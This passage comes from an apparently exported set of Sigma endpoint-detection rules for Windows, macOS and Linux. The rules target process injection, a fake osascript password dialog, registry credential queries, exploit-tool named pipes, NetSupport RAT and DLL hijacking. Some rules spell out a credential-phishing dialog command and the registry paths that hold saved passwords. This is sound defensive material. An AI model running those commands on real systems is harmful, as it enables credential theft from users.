"rule_description": "Detects the suspicious execution of the legitimate Windows binary OOBE-Maintenance.exe spawned without arguments, from a parent other than explorer.exe or sihost.exe. This can mean that the binary is being used as a sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them, so that the payload runs under the identity of a signed Microsoft binary and evades process-based detection.\nThis technique is used by Rhadamanthys, an information stealer which is being distributed mostly via malicious Google advertisements.\nIt is recommended to investigate the parent process performing this action, the network activities performed by the OOBE-Maintenance.exe process, and its memory for injected code (e.g. executable regions not backed by a file on disk) to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-03-27",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a848116c-c586-4b4a-8ec6-564b415f3c6d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618142Z",
"creation_date": "2026-03-23T11:45:34.618145Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618149Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html",
"https://attack.mitre.org/techniques/T1059/002/"
],
"name": "t1059_002_osascript_prompt_user.yml",
"content": "title: User Input Prompted by Osascript\nid: a848116c-c586-4b4a-8ec6-564b415f3c6d\ndescription: |\n Detects the execution of osascript with an inline AppleScript (-e) that displays a dialog asking the user for input (a \"display dialog\" with a \"default answer\" field).\n This could be abused by an attacker to present the user with a fake but legitimate-looking system dialog in order to gather information such as user credentials (local phishing). MDM and software-installer tooling is the usual legitimate source of such prompts, and some of it (Jamf, Snap Camera) is excluded by the rule.\n It is recommended to investigate the script and its provenance, the parent process and the dialog text itself to determine whether this action was legitimate and whether the user may have entered credentials into it.\nreferences:\n - https://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html\n - https://attack.mitre.org/techniques/T1059/002/\ndate: 2022/11/14\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Osascript\n - classification.macOS.LOLBin.Osascript\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # osascript -e 'display dialog \"Password\" default answer \"\" with icon note buttons {\"Cancel\", \"Continue\"} default button \"Continue\"'\n selection:\n Image: '/usr/bin/osascript'\n CommandLine|contains|all:\n - '-e'\n - 'display'\n - 'dialog'\n - 'answer'\n\n exclusion_snap_camera:\n CommandLine|contains: 'Do you want to remove all Snap Camera related data?'\n ParentCommandLine|contains: '/Applications/Snap Camera.app'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a848116c-c586-4b4a-8ec6-564b415f3c6d",
"rule_name": "User Input Prompted by Osascript",
"rule_description": "Detects the execution of osascript with an inline AppleScript (-e) that displays a dialog asking the user for input (a \"display dialog\" with a \"default answer\" field).\nThis could be abused by an attacker to present the user with a fake but legitimate-looking system dialog in order to gather information such as user credentials (local phishing). MDM and software-installer tooling is the usual legitimate source of such prompts, and some of it (Jamf, Snap Camera) is excluded by the rule.\nIt is recommended to investigate the script and its provenance, the parent process and the dialog text itself to determine whether this action was legitimate and whether the user may have entered credentials into it.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a867c7b0-919a-4aae-bf65-062b92f5a59e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624788Z",
"creation_date": "2026-03-23T11:45:34.624790Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624794Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/Alh4zr3d/status/1612176163509600256",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_registry_credential_queries.yml",
"content": "title: Possibly Sensitive Registry Values Queried\nid: a867c7b0-919a-4aae-bf65-062b92f5a59e\ndescription: |\n Detects when reg.exe is used to query registry values that may contain sensitive information such as credentials.\n Attackers can misuse this technique to access sensitive information stored in specific registry keys, such as WinLogon, VNC, or PuTTY.\n It is recommended to investigate such queries, review the permissions of processes accessing the registry keys, and check for any unauthorized access to sensitive information.\nreferences:\n - https://twitter.com/Alh4zr3d/status/1612176163509600256\n - https://attack.mitre.org/techniques/T1003/\ndate: 2023/01/09\nmodified: 2025/12/10\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\reg.exe'\n - OriginalFileName: 'reg.exe'\n selection_commandline_action:\n CommandLine|contains: 'query'\n selection_reg_values:\n CommandLine|contains:\n - '\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon'\n - '\\Software\\SimonTatham\\PuTTY\\Sessions'\n - '\\Software\\ORL\\WinVNC3\\Password'\n\n exclusion_defaultname:\n CommandLine:\n - 'reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v DefaultUserName'\n - 'reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v DefaultDomainName'\n\n exclusion_meraki:\n - ProcessParentOriginalFileName: 'm_agent_service.exe'\n # reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v AutoAdminLogonCurrentVersion\\Winlogon /reg:32 /v AutoAdminLogon\n CommandLine|contains|all:\n - 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'\n - 'AutoAdminLogon'\n 
- ProcessGrandparentOriginalFileName: 'm_agent_service.exe'\n # reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v AutoAdminLogonCurrentVersion\\Winlogon /reg:32 /v AutoAdminLogon\n CommandLine|contains|all:\n - 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'\n - 'AutoAdminLogon'\n - ProcessParentImage|endswith: '\\m_agent_service.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Meraki, LLC.'\n CommandLine|contains|all:\n - 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'\n - 'AutoAdminLogon'\n - ProcessGrandparentImage|endswith: '\\m_agent_service.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Meraki, LLC.'\n CommandLine|contains|all:\n - 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'\n - 'AutoAdminLogon'\n\n exclusion_touchify:\n ProcessParentImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\co.touchify.player\\Touchify Player.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Touchify'\n\n exclusion_emacs:\n CommandLine: '?:\\Windows\\system32\\reg.exe query HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions'\n ProcessParentOriginalFileName: 'emacs.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a867c7b0-919a-4aae-bf65-062b92f5a59e",
"rule_name": "Possibly Sensitive Registry Values Queried",
"rule_description": "Detects when reg.exe is used to query registry values that may contain sensitive information such as credentials.\nAttackers can misuse this technique to access sensitive information stored in specific registry keys, such as WinLogon, VNC, or PuTTY.\nIt is recommended to investigate such queries, review the permissions of processes accessing the registry keys, and check for any unauthorized access to sensitive information.\n",
"rule_creation_date": "2023-01-09",
"rule_modified_date": "2025-12-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a8b9aac2-c03f-4a42-b223-9380cae3dc1e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608732Z",
"creation_date": "2026-03-23T11:45:34.608735Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608743Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-lua-settings-enablelua"
],
"name": "t1559_suspicious_named_pipes_connected.yml",
"content": "title: Suspicious Named Pipe Connected\nid: a8b9aac2-c03f-4a42-b223-9380cae3dc1e\ndescription: |\n Detects the opening of a suspicious named pipe used by attackers.\n This named pipe has been used by attackers in real situations and it is related with malicious code.\n It is recommended to investigate the process that connected to the named pipe to determine its legitimacy.\nreferences:\n - https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-lua-settings-enablelua\ndate: 2022/07/26\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: named_pipe_connection\n product: windows\ndetection:\n selection:\n PipeName:\n # https://github.com/klinix5/InstallerFileTakeOver/blob/361612e69a91663890030a892805e58abdf2316c/InstallerFileTakeOver/InstallerFileTakeOver.cpp#L354\n # InstallerFileTakeOver Custom variant 1 (inlined) - https://bazaar.abuse.ch/sample/f181b8ae88f6c657c3ec3d1d5e8420fbf340c543b3d9292947ae035e3591b664/\n # InstallerFileTakeOver Custom variant 3 - https://bazaar.abuse.ch/sample/1fe63ba4b112edf2e4ec228ae95db0a3867cfbb6d48c1c19857f7d76f29f066e/\n - '\\ExploitPipe'\n # InstallerFileTakeOver Custom variant 2 - https://bazaar.abuse.ch/sample/f285006661a7c47aab70034566a3f1daf6ea7d09d31ed85303d45f5f8d3c67fd/\n - '\\KartoffelPipe'\n # https://github.com/itm4n/PrintSpoofer\n - '\\\\????????-????-????-????-????????????\\pipe\\spoolss'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a8b9aac2-c03f-4a42-b223-9380cae3dc1e",
"rule_name": "Suspicious Named Pipe Connected",
"rule_description": "Detects a process connecting to one of a small set of named pipes associated with known exploitation tooling (InstallerFileTakeOver variants and PrintSpoofer).\nThese pipe names have been observed in real-world attacks and are tied to malicious code.\nIt is recommended to investigate the process that connected to the named pipe to determine its legitimacy.\n",
"rule_creation_date": "2022-07-26",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a90eab98-24ff-483a-b9ce-12145ac7789b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625834Z",
"creation_date": "2026-03-23T11:45:34.625836Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625840Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.akamai.com/blog/security-research/the-definitive-guide-to-linux-process-injection",
"https://cocomelonc.github.io/linux/2024/11/22/linux-hacking-3.html",
"https://attack.mitre.org/techniques/T1055/008/"
],
"name": "t1055_008_ptrace_remote_code_injection.yml",
"content": "title: Ptrace Remote Code Injection\nid: a90eab98-24ff-483a-b9ce-12145ac7789b\ndescription: |\n Detects a ptrace system call with suspicious parameters.\n Adversaries may inject malicious code into processes using ptrace (process trace) system calls to evade process-based defenses and potentially elevate privileges.\n Ptrace system call injection is a method for executing arbitrary code within the address space of a separate, running process. This technique can be implemented using:\n - PTRACE_POKETEXT/PTRACE_POKEDATA: These operations copy data to specific memory addresses in the target process.\n - PTRACE_SETREGS: This sets control registers to point to the injected payload.\n It is recommended to investigate both the source and destination processes for suspicious behavior.\nreferences:\n - https://www.akamai.com/blog/security-research/the-definitive-guide-to-linux-process-injection\n - https://cocomelonc.github.io/linux/2024/11/22/linux-hacking-3.html\n - https://attack.mitre.org/techniques/T1055/008/\ndate: 2025/07/15\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055.008\n - classification.Linux.Source.ProcessPtrace\n - classification.Linux.Behavior.ProcessInjection\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n product: linux\n category: process_ptrace\ndetection:\n selection:\n AgentVersion|gte|version: 4.12.0\n ProcessImage|contains: '?'\n PtraceRequestStr:\n - 'PTRACE_POKETEXT' # Copy data to the remote process\n - 'PTRACE_POKEDATA' # Copy data to the remote process\n - 'PTRACE_SETREGS' # Modify the context of the remote process\n TargetIsChild: false\n\n exclusion_wine:\n ProcessImage|endswith:\n - '/bin/wineserver'\n - '/usr/lib/wine/wineserver64'\n\n exclusion_debugging_tools:\n ProcessImage|endswith:\n - '/bin/gdb'\n - '/libexec/gdb'\n - '/bin/gdbserver'\n - '/bin/ltrace'\n - '/bin/dlv'\n - 
'/dlv/linux/dlv'\n - '/go/dlv'\n - '/intel64/pinbin'\n - '/bin64/pinbin'\n - '/bin/lldb-server'\n\n exclusion_dynatrace:\n ProcessImage:\n - '/opt/dynatrace/*/oneagenthelper'\n - '/opt/dynatrace-agent/*/oneagenthelper'\n\n exclusion_reptyr:\n ProcessImage: '/usr/bin/reptyr'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a90eab98-24ff-483a-b9ce-12145ac7789b",
"rule_name": "Ptrace Remote Code Injection",
"rule_description": "Detects a ptrace system call using a memory-write or register-modification request (PTRACE_POKETEXT, PTRACE_POKEDATA or PTRACE_SETREGS) against a process that is not a child of the caller, which leaves out the common debugger case of tracing a spawned child.\nAdversaries may inject malicious code into processes using ptrace (process trace) system calls to evade process-based defenses and potentially elevate privileges.\nPtrace system call injection is a method for executing arbitrary code within the address space of a separate, running process. This technique can be implemented using:\n- PTRACE_POKETEXT/PTRACE_POKEDATA: These operations copy data to specific memory addresses in the target process.\n- PTRACE_SETREGS: This sets control registers to point to the injected payload.\nIt is recommended to investigate both the source and destination processes for suspicious behavior.\n",
"rule_creation_date": "2025-07-15",
"rule_modified_date": "2025-12-19",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a91853a8-d863-424a-8965-3bd13bd30147",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069633Z",
"creation_date": "2026-03-23T11:45:34.069636Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069644Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_ilasm.yml",
"content": "title: Ilasm.exe Sacrificial Process Spawned\nid: a91853a8-d863-424a-8965-3bd13bd30147\ndescription: |\n Detects the suspicious execution of the legitimate ilasm.exe Windows binary, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n The Vidar malware is known to use this technique.\n It is recommended to investigate the parent process performing this action and the destination IP address of the ilasm.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\ilasm.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a91853a8-d863-424a-8965-3bd13bd30147",
"rule_name": "Ilasm.exe Sacrificial Process Spawned",
"rule_description": "Detects the execution of the legitimate ilasm.exe Windows binary with a command line consisting solely of its path under the Microsoft.NET\\Framework directory, i.e. spawned without any arguments.\nThis can mean that the binary is being used as a sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThe Vidar malware is known to use this technique.\nIt is recommended to investigate the parent process performing this action and any network destinations contacted by the ilasm.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a952e760-ea38-44a8-986c-df40805bbac4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082914Z",
"creation_date": "2026-03-23T11:45:34.082916Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082920Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://perception-point.io/blog/operation-phantomblu-new-and-evasive-method-delivers-netsupport-rat/",
"https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_abnormal_netsupport_execution.yml",
"content": "title: Abnormal NetSupport Execution\nid: a952e760-ea38-44a8-986c-df40805bbac4\ndescription: |\n Detects the execution of NetSupport from an unusual location.\n NetSupport is a Remote Access Tool (RAT) which can be used by attackers to establish an interactive command and control channel to target systems within protected networks.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://perception-point.io/blog/operation-phantomblu-new-and-evasive-method-delivers-netsupport-rat/\n - https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2024/03/25\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.NetSupport\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ProcessOriginalFileName: 'client32.exe'\n - ProcessProduct: 'NetSupport Remote Control'\n\n filter_legitimate_path:\n Image:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n # https://help.netsupportschool.com/en-windows/Content/Windows/Deploy/deploy_getting_started.html\n - '?:\\Windows\\pcirdist.tmp\\PCIRISVR.EXE'\n\n filter_installer:\n ProcessDescription: 'NetSupport Installer Helper'\n ProcessParentImage|endswith: '\\msiexec.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a952e760-ea38-44a8-986c-df40805bbac4",
"rule_name": "Abnormal NetSupport Execution",
"rule_description": "Detects the execution of NetSupport (client32.exe or the 'NetSupport Remote Control' product) from a location other than Program Files or Program Files (x86), excluding the documented deployment helper path and msiexec-driven installations.\nNetSupport is a Remote Access Tool (RAT) which can be used by attackers to establish an interactive command and control channel to target systems within protected networks.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2024-03-25",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a9b65e67-ae73-4a0a-93a8-e87d4e15f3a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592987Z",
"creation_date": "2026-03-23T11:45:34.592990Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592998Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sdbinst.yml",
"content": "title: DLL Hijacking via sdbinst.exe\nid: a9b65e67-ae73-4a0a-93a8-e87d4e15f3a2\ndescription: |\n Detects potential Windows DLL Hijacking via sdbinst.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sdbinst.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\apphelp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a9b65e67-ae73-4a0a-93a8-e87d4e15f3a2",
"rule_name": "DLL Hijacking via sdbinst.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sdbinst.exe loading apphelp.dll.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting a malicious DLL in the same folder.\nNote that this rule excludes any sdbinst.exe located anywhere under the Windows directory (not only System32, SysWOW64 and WinSxS), so copies placed in user-writable subfolders of that directory are not alerted on.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a9e0a63b-2a2b-41d1-839b-cb482e15edcb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
